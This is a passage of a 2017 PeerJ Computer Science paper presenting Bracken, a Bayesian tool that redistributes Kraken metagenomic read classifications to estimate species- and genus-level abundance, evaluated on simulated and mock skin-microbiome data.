causative agent of anthrax), Bacillus cereus, and Bacillus thuringiensis are well over 99% identical and should all be designated as a single species (Helgason et al., 2000), although their names have not been changed despite their near-identity revealed by sequencing. As a compromise, taxonomists created the category Bacillus cereus group, between the level of species and genus, to include these three species and at least five others (Liu et al., 2015), all of which are extremely similar to one another. In some cases, two organisms that should be called the same species may even have different genus names. For example, Escherichia coli and Shigella flexneri are classified in different genera, but we know from sequence analysis that they represent the same species (Lan & Reeves, 2002). Failure to recognize the mutability of the bacterial taxonomy can lead to erroneous conclusions about the performance of metagenomic classifiers. For example, one recent study (Peabody et al., 2015) created a mock community of 11 species, one of which was Anabaena variabilis ATCC 29413, not realizing that this genome had been renamed and was synonymous with species in the genus Nostoc (Thiel et al., 2014). When Anabaena was removed from the database, Kraken correctly identified the reads as Nostoc, but Peabody et al. erroneously considered all these reads to be misclassified. Classification versus abundance estimation Kraken attempts to assign a taxonomy label to every read in a metagenomics sample using a custom-built database that may contain any species the user chooses. Among the current set of finished bacterial and archaeal genomes, hundreds of species can be found for which large fractions of their sequence are identical to other genomes belonging to distinct strains, species, or even genera. The reads arising from common regions in these species result in a tie when analyzed with Kraken’s classification algorithm, so Kraken correctly reports only the lowest common ancestor (LCA) (Wood & Salzberg, 2014). It follows that for well-populated clades with low genome diversity, Kraken only reports species-level Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 3/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104 assignments for reads from unique regions, and a true indication of total abundance can only be made by taking both species and genus (or higher) level assignments into account. This implies that for some species, the majority of reads might be classified at a higher level of the taxonomy. Kraken thus leaves many reads ‘‘stranded’’ above the species level, meaning that the number of reads classified directly to a species may be far lower than the actual number present. Therefore, any assumption that Kraken’s raw read assignments can be directly translated into species- or strain-level abundance estimates (e.g., Schaeffer et al., 2015) is flawed, as ignoring reads at higher levels of the taxonomy will grossly underestimate some species, and creates the erroneous impression that Kraken’s assignments themselves were incorrect. Nonetheless, metagenomics analysis often involves estimating the abundance of the species in a particular sample. Although we cannot unambiguously assign each read to a species, we would like to estimate how much of each species is present, specifically by estimating the number or percentage of reads in the sample. Several software tools have been developed to estimate species abundances in metagenomics samples [MetaPhlAn, ConStrains, GAAS, GASiC, TAEC, GRAMMy] (Angly et al., 2009; Lindner & Renard, 2012; Luo et al., 2015; Segata et al., 2012; Sohn et al., 2014; Xia et al., 2011). These tools, however, employ different strategies for read-level classification which are not always as accurate and efficient as Kraken’s k-mer approach (Lindgreen, Adair & Gardner, 2016). Rather than re-engineer Kraken to address the ambiguous read classification issue and to provide abundance estimates directly, we decided to implement the new species-level abundance estimation method described here as a separate program. This preserves both backwards compatibility for existing Kraken users, and offers the ability to generate more accurate species abundance estimates for datasets already processed by Kraken. Note that if Kraken fails to identify a species (e.g., if the species was missing from the Kraken database), Bracken too will not identify that species. MATERIALS AND METHODS Our new method, Bracken (Bayesian Reestimation of Abundance after Classification with KrakEN), estimates species abundances in metagenomics samples by probabilistically re-distributing reads in the taxonomic tree. Reads assigned to nodes above the species level are distributed down to the species nodes, while reads assigned at the strain level are re-distributed upward to their parent species. For example, in Fig. 1 we would distribute reads assigned to the Mycobacteriaceae family and the Mycobacterium genus down to M. marinum and M. avium, and reads assigned to each M. marinum strain would be reassigned to the M. marinum species. As we show below, Bracken can easily reestimate abundances at other taxonomic levels (e.g., genus or phylum) using the same algorithm. In order to re-assign reads classified at higher-level nodes in the taxonomy, we need to compute a probabilistic estimate of the number of reads that should be distributed to the species below that node. To illustrate using the nodes in Fig. 1, we need to allocate all reads assigned to Mycobacterium (G1) to M. marinum (S1) and M. avium (S2) below Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 4/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104 Figure 1 Schematic showing a partial taxonomic tree for the Mycobacteriaceae family. it, and reads assigned to the Mycobacteriaceae would have to be allocated to M. marinum (S1), M. avium (S2), andHoyosella altamirensis (S3). Reallocating reads from a genus-level node in the taxonomy to each genome below it can be accomplished using Bayes’ theorem, if the appropriate probabilities can be computed. Let P(Si) be the probability that a read in the sample belongs to genome Si, P(Gj) be the probability that a read is classified by Kraken at the genus level Gj, and P(Gj|Si) be the probability that a read from genome Si is classified by Kraken as the parent genus Gj. Then the probability that a read classified at genus Gj belongs to the genome Si can be expressed as Eq. (1): P(Si|Gj)= P(Gj|Si)P(Si) P(Gj) . (1) Note that because we began by assuming that a read was classified at node Gj, P(Gj)=1. Next we consider how to compute P(Gj|Si), the probability that a read from genome Si will be classified by Kraken at the parent genus Gj. We estimate this probability for reads of length r by classifying the sequences (genomes) that we used to build the database using that same database, as follows. For each k-mer in the sequences, Kraken assigns it a taxonomy ID by a fast lookup in its database. To assign a taxonomy ID for a read of length r, Kraken examines all k-mer classifications in that read. For example, for k =31 and r =75, the read will contain 45 k-mers. Our procedure examines, for each genome in the database, a sliding window of length r across the entire genome. To find the taxonomy ID Kraken would assign to each window, we simply find the deepest taxonomy node in the set of k-mers in that window. Since each k-mer in a database Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 5/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104 sequence is assigned to a taxonomy ID somewhere along the path from the genome’s taxonomy ID to the root, the highest-weighted root-to-leaf path (and thus the Kraken classification) corresponds to the deepest node. For each genome Si of length Li we thus generate (Li−r+1) mappings to taxonomical IDs. For node Gj, we then count the number of reads from Si that are assigned to it, NGj(Si). P(Gj|Si) is then the proportion of reads from Si that were assigned to the genus node Gj; i.e., P(Gj|Si)=NGj(Si)/(Li−r+1). We also calculate the proportion of reads from Si that were assigned to every node from genome Si to the root node of the taxonomy tree. The final term that we must calculate from Eq. (1) is P(Si), the probability that a read in the sample belongs to genome Si, which is computed in relation to other genomes from the same genus. For example, if the sample contains three genomes in the same genus, and if 30% of all reads from those three genomes belong to Si, then P(Si)=0.3. We estimate this probability using the reads that are uniquely assigned by Kraken to genome Si, as follows. If we let USi be the proportion of genome Si that is unique, then USi = NSi Li−r+1 (2) where NSi is the number of k-mers of length r that are uniquely assigned to genome Si by Kraken, and Li is the genome length. For example, if Li= 1 Mbp and only 250,000 k-mers are unique to genome Si, then USi=0.25. Then, using the number of reads KSi from a sample that Kraken actually assigns to Si, we can estimate the number of reads that likely derive from Si as: K̂Si = K Si U Si . (3) For example, if Kraken classifies 1,000 reads as genome Si and 25% of the reads from Si are unique, then we would estimate that 4,000 reads (1,000/0.25) from Si are contained in the sample. If genus Gj contains n genomes, we estimate the number of reads K̂S for each of the n genomes and then calculate P(Si) by: P (Si)= K̂Si∑n a=1K̂Sa . (4) Using this result in Eq. (1) above allows us to compute P(Si|Gj) for each genome Si. Each probability P(Si|Gj) is then used to estimate the proportion of the reads assigned to genus Gj that belong to each of the genomes below it. These calculations are repeated for each taxonomic level above the genus level (family, class, etc.), with read distribution at each level going to all genomes classified within that taxonomic subtree. To compute species abundance, any genome-level (strain-level) reads are simply added together at the species level. In cases where only one genome from a given species is detected by Kraken in the dataset, we simply add the reads distributed downward from the genus level (and above) to the reads already assigned by Kraken to the species level. In cases Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 6/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104 where multiple genomes exist for a given species, the reads distributed to each genome are combined and added to the Kraken-assigned species level reads. The added reads give the final species-level abundance estimates. This method can also estimate abundance for other taxonomic levels. In such cases, only higher nodes within the taxonomy tree undergo read distribution. After distributing reads downward, we estimate abundance for a node at the level specified by combining the distributed reads across all genomes within that node’s subtree. Software and data availability Bracken is written in Perl and Python and is freely available for download at http: //ccb.jhu.edu/software/bracken/. The reads from the skin microbiome experiment are freely available from NCBI under BioProject PRJNA316735. RESULTS AND DISCUSSION We applied the statistical re-assignment method described here to create species-level abundance estimates for several metagenomics data sets. The overall procedure works as follows. First, we compute a set of probabilities from the Kraken database by computing, for every sequence of length R in every genome, where it will be assigned in the taxonomy (see ‘Methods’). For our experiments, we set R=75 as our datasets contain 75-bp reads. Bracken can use these probabilities for any metagenomics data set, including data with different read lengths, although the estimates might be slightly improved by re-computing with a read length that matches the experimental data. Second, we run Kraken on the dataset to produce read-level taxonomic classifications. We then apply our abundance estimator, Bracken, which uses the numbers of reads assigned by Kraken at every level of the taxonomy to estimate the abundances at a single level (e.g., species). Note that to exclude false positives, Bracken ignores species with counts below a user-adjustable threshold. In our experiments, we selected a threshold of 10 reads. Experiments on a 100-genome metagenomics data set For our first experiments, we used a data set containing simulated Illumina reads from 100 genomes. This data, which we call here the i100 dataset, was used previously in a comparison of metagenomic assembly algorithms (Mende et al., 2012). The data contains 53.3 million paired reads (26.7M pairs) from 100 genomes representing 85 species. The reads have error profiles based on quality values found in real Illumina reads (Mende et al., 2012). The i100 dataset includes several very challenging genomes for this task, including multiple strains and species in the genera Bacillus and Mycobacteria, some of which are nearly identical to one another. The i100 data are freely available at http://www.bork.embl.de/~mende/simulated_data. The difficulty of estimating species abundance increases as the database itself contains more species. For example, it would clearly be easier to estimate abundances in the i100 dataset if we used a Kraken database containing only the 100 genomes in that dataset. To make the problem more realistic, we built two different databases and estimated abundance using both. The first (‘‘small’’) database contains 693 genomes including the i100 genomes; Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 7/17 https://peerj.com http://ccb.jhu.edu/software/bracken/ http://ccb.jhu.edu/software/bracken/ http://www.ncbi.nlm.nih.gov/bioproject/?term=PRJNA316735 http://www.bork.embl.de/~mende/simulated_data http://dx.doi.org/10.7717/peerj-cs.104 Figure 2 Estimates of species abundance in the i100 metagenomics dataset computed by Kraken (blue) and Bracken (blue + orange). For this result, the Kraken database contained 693 genomes that included the i100 genomes. The smaller graph displays results for the subset of species for which Bracken made the largest adjustments. The black line shows the true number of reads from each species. Precise numbers for the Kraken clas- sification, true read counts, and Bracken estimates are contained in Table S2A. this is the full database from the simulation study by Mende et al. (2012). The results when using the small database for classification are shown in Fig. 2. For several species, the initial Kraken numbers (reads assigned to a particular species) are far too low, because many of the reads (for some genomes, a large majority) were assigned labels at the genus level or above. After reestimation with Bracken, these reads were redistributed to the species level, with the result that almost all the abundance estimates were 98–99% correct, as shown in the figure. The second (‘‘large’’) database contains all genomes used in the synthetic and spike-in experiments, as well as a broad background of bacterial genomes. In particular, it includes all complete bacterial and archaeal genomes from RefSeq as of 25 July 2014 (archived at ftp://ftp.ncbi.nlm.nih.gov/genomes/archive/old_refseq), which total 2596 distinct taxa, plus those i100 genomes that were not present in the RefSeq data. (We excluded draft genomes because they often contain vector sequences or other contaminants.) We also added the nine genomes used in our skin bacteria spike-in experiment (described below) resulting in a total of 2635 distinct taxa. The complete list of sequences in the large database can be found in Table S1. The resulting Kraken database has a size of 74 GB. Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 8/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104/supp-2 ftp://ftp.ncbi.nlm.nih.gov/genomes/archive/old_refseq http://dx.doi.org/10.7717/peerj-cs.104/supp-1 http://dx.doi.org/10.7717/peerj-cs.104 Figure 3 Estimates of species abundance computed by Kraken (blue) and Bracken (blue + orange) for the i100 metagenomics data. For this re- sult, the Kraken database contained 2,635 distinct bacterial and archaeal taxa. The black line shows the true number of reads from each species. The smaller graph displays results for the subset of species for which Bracken made the largest adjustments. Precise numbers for the Kraken classifica- tion, true read counts, and Bracken estimates are contained in Table S2B. Figure 3 shows results when using the large database to estimate abundance for the i100 genomes. This test is much more difficult because of the large number of similar and near-identical genomes in the database. Many more reads are ambiguous, mapping identically to two or more species, which means that Kraken assigns them to the LCA of those species. Nonetheless, Bracken brings the estimated abundance of all species within 4% of the true abundance, and most fall within 1%. Note that when the re-estimation procedure distributes reads from higher nodes in the taxonomy down to multiple species within a single genus, it may over-estimate one species and underestimate its sister species if the re-allocation is imperfect. Tables S2A–S2B contains the detailed numbers for all species in Figs. 2 and 3, along with an error rate for each species in the i100 data, expressed as the difference between the true and estimated proportions. We calculated the average error as: 1 n n∑ i=1 ∣∣∣R(i)true−R(i)est∣∣∣ R(i)true (5) Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 9/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104/supp-2 http://dx.doi.org/10.7717/peerj-cs.104/supp-2 http://dx.doi.org/10.7717/peerj-cs.104/supp-2 http://dx.doi.org/10.7717/peerj-cs.104 Figure 4 Number of reads within the Mycobacterium genus as assigned by Kraken (blue), estimated by Bracken (purple) and compared to the true read counts (green). Initially, Kraken assigned only 325,073 reads to Mycobacterium sp. JLS although 722,880 reads originated from this species. Bracken reassigned 370,601 reads from the Mycobacterium genus to M. sp. JLS. Bracken’s re-estimated abundance for M. sp. JLS is much closer to the true read count. Table S3 contains precise numbers for all species shown here. where n is the number of species in the i100 data, R(i)true is the true number of reads for species i, and R(i)est is the Bracken estimate of the number of reads for species i. When using the small database, the average relative error of Bracken is 1.75% across all 85 species in the i100 data. For the larger database, the average relative error is 1.89%. We also calculated false positive rates for the i100 data as the percentage of total reads incorrectly classified after Bracken abundance estimation. For the small database, the false positive rate is 0.13% and for the large database, the false positive rate is 0.24%. Within the i100 genomes, the five species belonging to the Mycobacterium genus (M. tuberculosis, M. bovis, M. avium, M. marinum, and M. sp. JLS) pose a particular challenge for abundance estimation due to the similarities among their individual genomes. For example, Kraken classified only 9,733 M. tuberculosis reads at the species level, and classified the remaining 285,414 reads as either Mycobacterium (a genus) or M. tuberculosis complex (a taxonomic class intermediate between genus and species), as shown in Fig. 4 and Table S3. For these Mycobacteria genomes, Bracken reallocated the reads from higher-level nodes to yield species abundance estimates within 4% of the true abundance. Figure 4 and Table S3 show the number of reads assigned to each species by Kraken, the true number of reads, and the number of reads assigned to each species by Bracken after abundance reestimation. The five species of the Mycobacterium genus also provide an example of potential overestimation by Bracken. Bracken apportions all ambiguous reads classified by Kraken at the genus level (and above) to the existing species identified by Kraken. Because Bracken uses a probabilistic method in distributing the reads, one species may receive too many reads while another may receive too few. For example, Kraken assigned 543,916 reads to M. tuberculosis complex. Bracken re-allocated 296,543 of these reads to M. tuberculosis and the remaining 247,453 reads to M. bovis. When added to Kraken’s original assignments, Bracken estimated that 306,792 reads belonged to M. tuberculosis (11,645 reads more than the true number) that 256,927 reads belonged to M. bovis (31,473 reads less than the true number). It is likely that some of the additional reads Bracken allocated to M. tuberculosis originated from M. bovis instead. However, despite the over- and under-estimation, Bracken’s estimates fell within 4% of the true number of reads for both species. If M. bovis were excluded from the database, the 8,965 reads unique to M. bovis, as identified by Kraken, would be unclassified, while all 543,916 reads assigned to the Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 10/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104/supp-3 http://dx.doi.org/10.7717/peerj-cs.104/supp-3 http://dx.doi.org/10.7717/peerj-cs.104/supp-3 http://dx.doi.org/10.7717/peerj-cs.104 M. tuberculosis complex would assigned to M. tuberculosis by Kraken. These reads would no longer be ambiguous because no other Mycobacterium species from the M. tuberculosis complex would be present in the database. In general, reads belonging to species excluded from the database will either be assigned to species with very high similarity to the missing species or will remain unclassified. Experiments on a real metagenomics sample created from known species For a more realistic evaluation of the performance of Bracken, we generated new sequence data using a set of bacteria that are commonly found on healthy human skin. This mock community was assembled by combining purified DNA from nine isolates that were identified and sequenced during the initial phase of the Human Microbiome Project (Human Microbiome Project, 2012): Acinetobacter radioresistens strain SK82, Corynebacterium amycolatum strain SK46, Micrococcus luteus strain SK58, Rhodococcus erythropolis strain SK121, Staphylococcus capitis strain SK14, Staphylococcus epidermidis strain SK135, Staphylococcus hominis strain SK119, Staphylococcus warneri strain SK66, and Propionibacterium acnes strain SK137. To generate the skin microbiome community, purified DNA was obtained from the Biodefense and Emerging Infections Research Resources Repository (BEI Resources). Each of the nine bacterial isolates was grown under conditions recommended by BEI Resources, collected by centrifugation during log growth phase at a 600nm optical density (OD600) of 0.8–1.2, and genomic DNA was isolated using MasterPure DNA isolation reagents (Epicentre). Purified genomic DNA was quantified using the high sensitivity picogreen assay (Invitrogen), pooled in equal amounts by mass, and prepared for sequencing using Nextera XT library preparation reagents (Illumina). The sample was then sequenced on a HiSeq sequencer, generating a total of 78,439,985 million read pairs (157 million reads), all of them 100 bp in length. These were then classified as pairs by Kraken, which concatenates the two reads from each pair and assigns them to a single taxonomic category. We used Bracken to estimate both species and genus-level abundance in the skin microbiome community. In the Bracken results, the nine true species comprise over 99% of the species-level abundance estimates. The mixture was created with approximately equal amounts of each of the nine genomes, so the expectation was that each species would account for∼11% of the total. However, as shown in Fig. 5, the estimates varied from 7.3% to 14.8%. Details for the exact number of reads assigned by Kraken and the abundance estimates by Bracken are shown in Table S4. Deviations from the expected abundance could arise from a variety of factors. The process of quantifying DNA and mixing in equal amounts can be influenced by pipetting consistency. Second, library amplification by PCR, an integral step in the Nextera library preparation process, can exaggerate small differences in quantities and lead to significant biases in abundance (Bowers et al., 2015). We examined a sample of the classified reads by hand, and could find no evidence that Kraken mis-classified reads from M. luteus (the smallest portion of the community, estimated at 7.3%) to any of the other species or Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 11/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104/supp-4 http://dx.doi.org/10.7717/peerj-cs.104 Figure 5 Estimates of species abundance made by Bracken for the metagenomics community contain- ing isolates of nine bacterial species commonly found on human skin. Precise numbers can be found in Table S4. genera. The abundances found in this data, therefore, may correspond fairly closely with the true abundances. The genus-level abundance estimates computed by Bracken also correspond closely to the expected abundances for the six genera included in the sample. Four of the nine species belong to the genus Staphylococcus, which was thus expected to comprise 44% (4×11%) of the sample. The Bracken estimate was 43.3%. Each of the other genus classifications has only one species present, and their abundance estimates are the same for both genus and species. The comparison between the Kraken classification of reads and Bracken’s reassignment revealed that the nine species are sufficiently distinct to allow Kraken to classify a large majority of reads at the species level, with very few reads being classified at higher levels of the taxonomy. Specifically, Kraken classified 76.4 million reads to the nine species included in the sample. Only 1.3 million reads out of the 78.2 million total (1.6%) were classified by Kraken at the genus level or above. (The remaining reads were unclassified.) In this case Bracken does not provide a substantial benefit, because reassignment of the 1.3 million reads could yield at most a 1.6% change in the estimated composition of the sample. Abundance estimation timing and resource requirements In the i100 data experiment with the small database, we used 188 gigabytes (GB) of RAM with 10 threads to build the Kraken database and generate the k-mer distribution file required by Bracken. In total, these steps completed in about 2 h and yielded files that can be used across multiple datasets. The resulting Kraken database and distribution files use 53 GB of space. Kraken classification of the i100 dataset took 18 min, using 10 threads and 107 GB of RAM. This step is limited by the size of the database, which is loaded into RAM during classification. Bracken alone runs in under a second, using 35 MB of RAM. The Kraken classification file for the i100 data is 1.6 GB, while Bracken abundance estimation Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 12/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104/supp-4 http://dx.doi.org/10.7717/peerj-cs.104 files require∼65 KB of space. Table S5 lists detailed timing, RAM, and space requirements for each file and step of the Bracken abundance estimation algorithm. CONCLUSION Estimating the abundance of species, genera, phyla, or other taxonomic groups is a central step in the analysis of many metagenomics datasets. Metagenomics classifiers like Kraken provide a very fast and accurate way to label individual reads, and at higher taxonomic levels such as phyla, these assignments can be directly translated to abundance estimates. However, many reads cannot be unambiguously assigned to a single strain or species, for at least two reasons. First, many bacterial species are nearly identical, meaning that a read can match identically to two or more distinct species. Second, the bacterial taxonomy itself is undergoing constant revisions and updates, as genome sequencing reveals the need to re-assign species to new names. These revisions sometimes create new taxa that share near-identical sequence with a distinct species. In these situations, Kraken correctly assigns the read to a higher-level taxonomic category such as genus or family. This creates a problem in that Kraken’s classifications cannot be used directly for species abundance estimation. Bracken addresses this problem by probabilistically re-assigning reads from intermediate taxonomic nodes to the species level or above. As we have shown here, these re-assignments produce species-level abundance estimates that are very accurate, typically 98% correct or higher. For genus-level abundance, accuracy is even higher because fewer reads have ambiguous assignments at that level. For abundance estimation at higher levels, ranging from family up to phylum, Kraken’s original read assignments can be used directly to create abundance estimates. ACKNOWLEDGEMENTS We would like to thank Derrick Wood for valuable suggestions on the implementation of the algorithm, and Kasper Hansen for helpful comments and feedback on a draft version of this manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported in part by the US National Institutes of Health R01-HG006677 and R01-GM083873 and by the US Army Research Office W911NF-1410490. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: US National Institutes of Health: R01-HG006677, R01-GM083873. US Army Research Office: W911NF-1410490. Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 13/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104/supp-5 http://dx.doi.org/10.7717/peerj-cs.104 Competing Interests Steven L. Salzberg is currently serving as an Academic Editor for PeerJ. Author Contributions • Jennifer Lu and Florian P. Breitwieser conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Peter Thielen performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • Steven L. Salzberg conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Bracken is written in Perl and Python and is freely available for download at http://ccb.jhu.edu/software/bracken/. The reads from the skin microbiome experiment are freely available from NCBI under BioProject PRJNA316735. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.104#supplemental-information. REFERENCES Angly FE, Willner D, Prieto-Davo A, Edwards RA, Schmieder R, Vega-Thurber R, Antonopoulos DA, Barott K, Cottrell MT, Desnues C, Dinsdale EA, Furlan M, Haynes M, Henn MR, Hu Y, Kirchman DL, McDole T, McPherson JD, Meyer F, Miller RM, Mundt E, Naviaux R, Rodriguez B, Stevens RK, Wegley L, Zhang L, Zhu B, Rohwer F. 2009. The GAAS metagenomic tool and its estimations of viral and microbial average genome size in four major biomes. PLos Computational Biology 5:e1000593 DOI 10.1371/journal.pcbi.1000593. Benson DA, Clark K, Karsch-Mizrachi I, Lipman DJ, Ostell J, Sayers EW. 2015. GenBank. Nucleic Acids Research 43:D30–D35 DOI 10.1093/nar/gku1216. Bowers RM, Clum A, Tice H, Lim J, Singh K, Ciobanu D, Ngan CY, Cheng JF, Tringe SG, Woyke T. 2015. Impact of library preparation protocols and template quantity on the metagenomic reconstruction of a mock microbial community. BMC Ge- nomics 16:856 DOI 10.1186/s12864-015-2063-6. Brosch R, Gordon SV, Marmiesse M, Brodin P, Buchrieser C, Eiglmeier K, Garnier T, Gutierrez C, Hewinson G, Kremer K, Parsons LM, Pym AS, Samper S, Van Soolingen D, Cole ST. 2002. A new evolutionary scenario for the Mycobacterium tuberculosis complex. Proceedings of the National Academy of Sciences of the United States of America 99:3684–3689 DOI 10.1073/pnas.052548299. Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 14/17 https://peerj.com http://ccb.jhu.edu/software/bracken/ http://www.ncbi.nlm.nih.gov/bioproject/?term=PRJNA316735 http://dx.doi.org/10.7717/peerj-cs.104#supplemental-information http://dx.doi.org/10.7717/peerj-cs.104#supplemental-information http://dx.doi.org/10.1371/journal.pcbi.1000593 http://dx.doi.org/10.1093/nar/gku1216 http://dx.doi.org/10.1186/s12864-015-2063-6 http://dx.doi.org/10.1073/pnas.052548299 http://dx.doi.org/10.7717/peerj-cs.104 Garnier T, Eiglmeier K, Camus JC, Medina N, Mansoor H, Pryor M, Duthoy S, Grondin S, Lacroix C, Monsempe C, Simon S, Harris B, Atkin R, Doggett J, Mayes R, Keating L, Wheeler PR, Parkhill J, Barrell BG, Cole ST, Gordon SV, Hewinson RG. 2003. The complete genome sequence of Mycobacterium bovis. Proceedings of the National Academy of Sciences of the United States of America 100:7877–7882 DOI 10.1073/pnas.1130426100. Grange JM. 2001. Mycobacterium bovis infection in human beings. Tuberculosis 81:71–77 DOI 10.1054/tube.2000.0263. Helgason E, Okstad OA, Caugant DA, Johansen HA, Fouet A, Mock M, Hegna I, Kolsto AB. 2000. Bacillus anthracis, Bacillus cereus, and Bacillus thuringiensis–one species on the basis of genetic evidence. Applied and Environmental Microbiology 66:2627–2630 DOI 10.1128/AEM.66.6.2627-2630.2000. Human Microbiome Project C. 2012. Structure, function and diversity of the healthy human microbiome. Nature 486:207–214 DOI 10.1038/nature11234. Lan R, Reeves PR. 2002. Escherichia coli in disguise: molecular origins of Shigella. Microbes and Infection 4:1125–1132 DOI 10.1016/S1286-4579(02)01637-4. Lindgreen S, Adair KL, Gardner PP. 2016. An evaluation of the accuracy and speed of metagenome analysis tools. Scientific Reports 6:Article 19233 DOI 10.1038/srep19233. Lindner MS, Renard BY. 2012. Metagenomic abundance estimation and diagnostic testing on species level. Nucleic Acids Research 41:e10 DOI 10.1093/nar/gks803. Liu Y, Lai Q, Göker M, Meier-Kolthoff JP, Wang M, Sun Y, Wang L, Shao Z. 2015. Genomic insights into the taxonomic status of the Bacillus cereus group. Scientific Reports 5:Article 14082 DOI 10.1038/srep14082. Luo C, Knight R, Siljander H, Knip M, Xavier RJ, Gevers D. 2015. ConStrains identifies microbial strains in metagenomic datasets. Nature Biotechnology 33:1045–1052 DOI 10.1038/nbt.3319. Mende DR, Waller AS, Sunagawa S, Jarvelin AI, Chan MM, Arumugam M, Raes J, Bork P. 2012. Assessment of metagenomic assembly using simulated next generation sequencing data. PLoS ONE 7:e31386 DOI 10.1371/journal.pone.0031386. Morgulis A, Coulouris G, Raytselis Y, Madden TL, Agarwala R, Schaffer AA. 2008. Database indexing for production MegaBLAST searches. Bioinformatics 24:1757–1764 DOI 10.1093/bioinformatics/btn322. Peabody MA, Van Rossum T, Lo R, Brinkman FS. 2015. Evaluation of shotgun metagenomics sequence classification methods using in silico and in vitro simulated communities. BMC Bioinformatics 16:363 DOI 10.1186/s12859-015-0788-5. Riesenfeld CS, Schloss PD, Handelsman J. 2004. Metagenomics: genomic analysis of microbial communities. Annual Review of Genetics 38:525–552 DOI 10.1146/annurev.genet.38.072902.091216. Schaeffer L, Pimentel H, Bray N, Melsted P, Pachter L. 2015. Pseudoalignment for metagenomic read assignment. ArXiv preprint. arXiv:1510.07371v07372. Segata N, Waldron L, Ballarini A, Narasimhan V, Jousson O, Huttenhower C. 2012. Metagenomic microbial community profiling using unique clade-specific marker genes. Nature Methods 9:811–814 DOI 10.1038/nmeth.2066. Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 15/17 https://peerj.com http://dx.doi.org/10.1073/pnas.1130426100 http://dx.doi.org/10.1054/tube.2000.0263 http://dx.doi.org/10.1128/AEM.66.6.2627-2630.2000 http://dx.doi.org/10.1038/nature11234 http://dx.doi.org/10.1016/S1286-4579(02)01637-4 http://dx.doi.org/10.1038/srep19233 http://dx.doi.org/10.1093/nar/gks803 http://dx.doi.org/10.1038/srep14082 http://dx.doi.org/10.1038/nbt.3319 http://dx.doi.org/10.1371/journal.pone.0031386 http://dx.doi.org/10.1093/bioinformatics/btn322 http://dx.doi.org/10.1186/s12859-015-0788-5 http://dx.doi.org/10.1146/annurev.genet.38.072902.091216 http://arXiv.org/abs/1510.07371v07372 http://dx.doi.org/10.1038/nmeth.2066 http://dx.doi.org/10.7717/peerj-cs.104 Sohn M, An L, Pookhao N, Li Q. 2014. Accurate genome relative abundance estimation for closely related species in a metagnomic sample. BMC Bioinformatics 15:Article 242 DOI 10.1186/1471-2105-15-242. The International Human Genome Sequencing Consortium. 2001. Initial sequencing and analysis of the human genome. Nature 409:860–921 DOI 10.1038/35057062. Thiel T, Pratte BS, Zhong J, Goodwin L, Copeland A, Lucas S, Han C, Pitluck S, Land ML, Kyrpides NC, Woyke T. 2014. Complete genome sequence of Anabaena variabilis ATCC 29413. Standards in Genomic Sciences 9:562–573 DOI 10.4056/sigs.3899418. Venter JC, Adams MD, Myers EW, Li PW, Mural RJ, Sutton GG, Smith HO, Yandell M, Evans CA, Holt RA, Gocayne JD, Amanatides P, Ballew RM, Huson DH, Wortman JR, Zhang Q, Kodira CD, Zheng XH, Chen L, Skupski M, Subramanian G, Thomas PD, Zhang J, Gabor Miklos GL, Nelson C, Broder S, Clark AG, Nadeau J, McKusick VA, Zinder N, Levine AJ, Roberts RJ, Simon M, Slayman C, Hunkapiller M, Bolanos R, Delcher A, Dew I, Fasulo D, Flanigan M, Florea L, Halpern A, Han- nenhalli S, Kravitz S, Levy S, Mobarry C, Reinert K, Remington K, Abu-Threideh J, Beasley E, Biddick K, Bonazzi V, Brandon R, Cargill M, Chandramouliswaran I, Charlab R, Chaturvedi K, Deng Z, Di Francesco V, Dunn P, Eilbeck K, Evangelista C, Gabrielian AE, Gan W, Ge W, Gong F, Gu Z, Guan P, Heiman TJ, Higgins ME, Ji RR, Ke Z, Ketchum KA, Lai Z, Lei Y, Li Z, Li J, Liang Y, Lin X, Lu F, Merkulov GV, Milshina N, Moore HM, Naik AK, Narayan VA, Neelam B, Nusskern D, Rusch DB, Salzberg S, Shao W, Shue B, Sun J, Wang Z, Wang A, Wang X, Wang J, Wei M, Wides R, Xiao C, Yan C, Yao A, Ye J, Zhan M, Zhang W, Zhang H, Zhao Q, Zheng L, Zhong F, Zhong W, Zhu S, Zhao S, Gilbert D, Baumhueter S, Spier G, Carter C, Cravchik A, Woodage T, Ali F, An H, Awe A, Baldwin D, Baden H, Barnstead M, Barrow I, Beeson K, Busam D, Carver A, Center A, Cheng ML, Curry L, Danaher S, Davenport L, Desilets R, Dietz S, Dodson K, Doup L, Ferriera S, Garg N, Gluecksmann A, Hart B, Haynes J, Haynes C, Heiner C, 